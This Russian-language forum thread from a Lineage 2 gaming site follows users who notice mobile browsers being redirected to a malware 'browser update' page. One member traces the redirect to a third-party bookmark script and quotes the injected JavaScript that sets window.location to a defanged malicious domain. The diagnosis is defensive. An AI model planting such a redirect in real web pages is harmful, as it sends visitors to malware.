Русский язык English language
mmotop topzone hopzone l2server brazil

О сайте, форуме Обсуждение сайта и форума. Вопросы и предложения оставляйте здесь.

Ответ
 
Опции темы Опции просмотра

Старый 12.12.2013, 11:42 По умолчанию Форум предлагает скачать вирус
  #1
kinaran
Newbie 0 Lv.
 
Аватар для kinaran
Show
 
Регистрация: 11.12.2013
Возраст: 41
Сообщений: 4
Сказал(а) спасибо: 0
Поблагодарили 2 раз(а) в 1 сообщении

Android, Firefox
При переходах по ссылкам внутри форума браузер упорно переход на эту страницу.

Переадресация производится не сразу при открытии форума в мобильном браузере, а по какому-то алгоритму, чтобы не палиться. Где-то на сайте/форуме внедрён вредоносный код.

p.s. переадресует на "w e b o n l i n e s точка c o m"

Последний раз редактировалось kinaran; 12.12.2013 в 11:56.
kinaran вне форума  
2 пользователя(ей) сказали cпасибо:
Mineshiele (12.12.2013), Конь (12.12.2013)

Старый 12.12.2013, 11:44 По умолчанию
  #2
KOTEUKA
Baron 58 Lv.
 
Аватар для KOTEUKA
Show
 
Регистрация: 10.08.2012
Сообщений: 1,493
Сказал(а) спасибо: 2,559
Поблагодарили 763 раз(а) в 479 сообщениях
Цитата:
Сообщение от kinaran Посмотреть сообщение
Android, Firefox
хром андроидский тоже эту ссылку выдаёт
__________________
EMKA - кот... просто кот...
KOTEUKA вне форума  

Старый 12.12.2013, 12:15 По умолчанию
  #3
DESTRODAMA
Заблокирован
 
Аватар для DESTRODAMA
Show
 
Регистрация: 06.05.2011
Адрес: SPb
Возраст: 33
Сообщений: 1,519
Сказал(а) спасибо: 504
Поблагодарили 307 раз(а) в 222 сообщениях
такое же было, только с *оранжевой белочкой*....
помогло скидывание(форматирование) всей памяти(кроме системной - там был сделан сброс)
ну и конечно установка антивируса Dr. Web Light.
Сейчас таких проблем нет.
Имхо мне кажется - проблема не в том, что чтото внедрено, а чтото в ваши браузеры встроено - надстройки)
DESTRODAMA вне форума  

Старый 12.12.2013, 12:40 По умолчанию
  #4
kinaran
Newbie 0 Lv.
 
Аватар для kinaran
Show
 
Регистрация: 11.12.2013
Возраст: 41
Сообщений: 4
Сказал(а) спасибо: 0
Поблагодарили 2 раз(а) в 1 сообщении
DESTRODAMA, если бы это был Internet Explorer, можно было бы согласиться с вами. Но не Firefox на Android, с единственным дополнением Adblock. Тем более, что и на другом браузере тоже пернадресовало. Это делается на стороне сервера...
kinaran вне форума  

Старый 12.12.2013, 12:55 По умолчанию
  #5
Trolinich
Заблокирован
 
Аватар для Trolinich
Show
 
Регистрация: 16.08.2011
Возраст: 29
Сообщений: 1,612
Сказал(а) спасибо: 555
Поблагодарили 198 раз(а) в 159 сообщениях
Цитата:
Сообщение от kinaran Посмотреть сообщение
Это делается на стороне сервера...
тогда почему оно провлется только на мобильных и на андроиде?)
Trolinich вне форума  

Старый 12.12.2013, 12:59 По умолчанию
  #6
Кувалда
Heir 20 Lv.
 
Аватар для Кувалда
Show
 
Регистрация: 12.01.2013
Сообщений: 131
Сказал(а) спасибо: 53
Поблагодарили 109 раз(а) в 67 сообщениях
на винфоне и айосе ниче подобного никогда не было... вывод: выбросьте андройд к чертям собачьим
Кувалда вне форума  

Старый 12.12.2013, 13:13 По умолчанию
  #7
kinaran
Newbie 0 Lv.
 
Аватар для kinaran
Show
 
Регистрация: 11.12.2013
Возраст: 41
Сообщений: 4
Сказал(а) спасибо: 0
Поблагодарили 2 раз(а) в 1 сообщении
Потому, что вирус под андроид написан.
Потому, что сервер определяет по идентификатору браузера его платформу и показывает только для андроид.
Почему показывает не всегда - чтобы админами не было замечено.

Windows тоже выбросьте, самый большая среда для вирусов. И про л2 забудьте тогда ;)
kinaran вне форума  

Старый 12.12.2013, 13:19 По умолчанию
  #8
Кувалда
Heir 20 Lv.
 
Аватар для Кувалда
Show
 
Регистрация: 12.01.2013
Сообщений: 131
Сказал(а) спасибо: 53
Поблагодарили 109 раз(а) в 67 сообщениях
Цитата:
Сообщение от kinaran Посмотреть сообщение
И про л2 забудьте тогда ;)
и правда... что же мне делать,с телефона в ла2 не поиграю...
Кувалда вне форума  

Старый 12.12.2013, 13:21 По умолчанию
  #9
Trolinich
Заблокирован
 
Аватар для Trolinich
Show
 
Регистрация: 16.08.2011
Возраст: 29
Сообщений: 1,612
Сказал(а) спасибо: 555
Поблагодарили 198 раз(а) в 159 сообщениях
совсем зажрались, я смотрю, лезут с телефонов на сайт и еще возмущаются
Trolinich вне форума  

Старый 12.12.2013, 13:51 По умолчанию
  #10
DESTRODAMA
Заблокирован
 
Аватар для DESTRODAMA
Show
 
Регистрация: 06.05.2011
Адрес: SPb
Возраст: 33
Сообщений: 1,519
Сказал(а) спасибо: 504
Поблагодарили 307 раз(а) в 222 сообщениях
Цитата:
Сообщение от kinaran Посмотреть сообщение
DESTRODAMA, если бы это был Internet Explorer, можно было бы согласиться с вами. Но не Firefox на Android, с единственным дополнением Adblock. Тем более, что и на другом браузере тоже пернадресовало. Это делается на стороне сервера...
для вас видимо слово *надстройки* ассоциируются только с IE.
Поверьте, в других браузерах они тоже есть, только могут называться:
1)Сертификатами
2)Расширениями
3)Плагинами

+ такое может быть, что другие программы, которые вы наверняка качали, содержали в себе какую нибудь такую бредятину.
Если андроид на линукс, то это не значит что вирусов не словите - мир не стоит на месте и утопическая фраза *на линукс нет вирусов* уже дааааавно не канает)

--- Добавлено в 13:51 --- Предыдущее сообщение было написано в 13:47 ---

Цитата:
Сообщение от Кувалда Посмотреть сообщение
на винфоне и айосе ниче подобного никогда не было... вывод: выбросьте андройд к чертям собачьим
вспоминается фраза из фильма *Приключение Шурика*
Только речь не о несчастных случаях на стройке, а о вирусах на андроиде)
DESTRODAMA вне форума  

Старый 12.12.2013, 14:02 По умолчанию
  #11
KOTEUKA
Baron 58 Lv.
 
Аватар для KOTEUKA
Show
 
Регистрация: 10.08.2012
Сообщений: 1,493
Сказал(а) спасибо: 2,559
Поблагодарили 763 раз(а) в 479 сообщениях
Цитата:
Сообщение от Trolinich Посмотреть сообщение
совсем зажрались, я смотрю, лезут с телефонов на сайт и еще возмущаются
то ли дело твоя деревня? там такого нету?
__________________
EMKA - кот... просто кот...
KOTEUKA вне форума  

Старый 12.12.2013, 14:39 По умолчанию
  #12
Trolinich
Заблокирован
 
Аватар для Trolinich
Show
 
Регистрация: 16.08.2011
Возраст: 29
Сообщений: 1,612
Сказал(а) спасибо: 555
Поблагодарили 198 раз(а) в 159 сообщениях
Цитата:
Сообщение от KOTEUKA Посмотреть сообщение
то ли дело твоя деревня? там такого нету?
конечно нету, это ж еще прошлый век! Или у вас еще до сих пор на андроиде сидят?
Trolinich вне форума  

Старый 12.12.2013, 15:22 По умолчанию
  #13
Иисус
Baron 52 Lv.
 
Аватар для Иисус
Show
 
Регистрация: 29.01.2013
Сообщений: 953
Сказал(а) спасибо: 2,220
Поблагодарили 293 раз(а) в 207 сообщениях
Честно, разбираться не пытался, но когда на форум меги захожу антивирус всегда блочит какую-то вредоносную ссылку, захожу с FireFox с компа естественно, такое только на этом форуме.
Иисус вне форума  

Старый 12.12.2013, 17:13 По умолчанию
  #14
kinaran
Newbie 0 Lv.
 
Аватар для kinaran
Show
 
Регистрация: 11.12.2013
Возраст: 41
Сообщений: 4
Сказал(а) спасибо: 0
Поблагодарили 2 раз(а) в 1 сообщении
Цитата:
Сообщение от DESTRODAMA Посмотреть сообщение
для вас видимо слово *надстройки* ассоциируются только с IE.
Поверьте, в других браузерах они тоже есть, только могут называться:
1)Сертификатами
2)Расширениями
3)Плагинами

+ такое может быть, что другие программы, которые вы наверняка качали, содержали в себе какую нибудь такую бредятину.
Если андроид на линукс, то это не значит что вирусов не словите - мир не стоит на месте и утопическая фраза *на линукс нет вирусов* уже дааааавно не канает)[COLOR="Silver"]

Нет, вовсе нет. Android + Firefox мною упомянуты ещё раз, намекая на его ограниченные возможности по части плагинов и расширений. А вовсе не на линукс без вирусов.

Смотрите:
  • берём чистую (наисвежеустановленную) виртуальную машину с Windows и Firefox
  • удаляём ВСЕ куки и историю, для чистоты эксперимента;
  • ставим плагин HttpFox для записи обмена с сервером;
  • ставим плагин User Agent Switcher, добавляем туда User Agent от браузера на Android, Chrome или Firefox, без разницы;
  • переключаем User Agent на андроидовый браузер, чтобы сервер думал, что мы с зашли телефона;
  • включаем лог http;
  • идём на наш сайт (zmega.com) и бродим по форуму пару минут;
  • через некоторое время нас посылает на страницу обновления браузера, что и требовалось доказать.


Лог выложен тут, если кто понимает его содержимое.

Чтобы воспроизвести эту последовательность ещё раз, надо удалить все (конечно, нужны только какие-то конкретные из них, но какие - пока не ясно) куки и перезапустить браузер.

--- Добавлено в 19:13 --- Предыдущее сообщение было написано в 17:57 ---

Вот что нашлось сейчас:

Если разрешены скрипты с сайта odnaknopka (это кнопки "Добавить в закладки:" под сообщениями в теме), всё работает некоторое время как ожидалось.

Потом, через это некоторое время, и если браузер на Android, в конце скрипта появляется новый код:
Цитата:
(function(w) {
window.location = "h t t p: / / w e b w o n l i n e s . c o m / s/14305";
})(window);
Ещё через некоторое время (чтоб никто не заметил :) ) происходит ошибка загрузки этого скрипта и выполняется переадресация на вирус.
Вот такие дела...
Примеры скриптов, получаем в ходе этой последовательности

Последний раз редактировалось kinaran; 12.12.2013 в 17:12.
kinaran вне форума  

Ответ


Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход